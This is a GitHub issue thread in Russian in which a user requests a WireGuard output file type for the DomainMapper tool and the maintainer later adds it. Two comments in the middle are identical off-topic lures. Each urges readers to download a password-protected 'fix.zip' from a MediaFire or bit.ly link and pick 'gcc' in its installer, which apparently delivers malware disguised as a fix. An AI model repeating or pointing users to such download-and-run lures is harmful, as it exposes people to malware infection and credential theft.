### ISSUE TITLE
Добавить тип файла для vpn wireguard

### ISSUE THREAD

**Issue by sanikroot** [Ground-Zerro/DomainMapper#18]
[patch.patch](https://github.com/user-attachments/files/16765498/patch.patch)
Здравствуйте, можно добавить ещё один тип файлов для wireguard?
Я не программист, 10 лет назад что-то писал на QT, хз как оформлять патчи для git тем более на python

Пример: 10.0.0.0/24, 10.0.2.0/23, 10.0.4.0/22, 10.0.8.0/21, 10.0.16.0/20, 10.0.32.0/19, 10.0.64.0/18, 10.0.128.0/17, 10.1.0.0/16, 10.2.0.0/15, 10.4.0.0/14, 10.8.0.0/13, 10.16.0.0/12, 10.32.0.0/11, 10.64.0.0/10, 10.128.0.0/9

**Comment by miniMuggle** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by Ground-Zerro** [comment]
> [patch.patch](https://github.com/user-attachments/files/16765498/patch.patch)
> Здравствуйте, можно добавить ещё один тип файлов для wireguard?

Можно.
Была мысль добавить в DM прямую коррекцию конфига wireguard, делал такой отдельный скрипт для себя, но так наверное проще.

> Я не программист, 10 лет назад что-то писал на QT, хз как оформлять патчи для git тем более на python

Я лет 30 назад что-то пытался писать на ZX spectrum basic, а потом пришел PC и командная строка покрыла все мои потребности, хорошо что python скриптовый язык, так бы совсем в нем ничего не понимал.

**Comment by Ground-Zerro** [comment]
Добавлено.
